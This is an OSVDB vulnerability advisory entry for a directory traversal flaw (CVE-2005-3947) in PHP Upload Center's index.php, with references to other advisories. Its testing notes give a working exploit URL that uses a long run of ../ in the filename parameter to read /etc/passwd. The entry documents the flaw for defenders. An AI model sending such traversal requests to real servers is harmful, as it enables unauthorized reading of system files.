PHP Upload Center index.php filename Variable Traversal Arbitrary File Access

2005-11-29T03:43:59
ID OSVDB:22182
Type osvdb
Reporter OSVDB
Modified 2005-11-29T03:43:59

Description

Manual Testing Notes

http://[target]/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd

References:

Other Advisory URL: http://www.blogcu.com/Liz0ziM/126975 Other Advisory URL: http://liz0.3yr.net/phpuploadcenter.txt CVE-2005-3947 Bugtraq ID: 15621 Bugtraq ID: 15626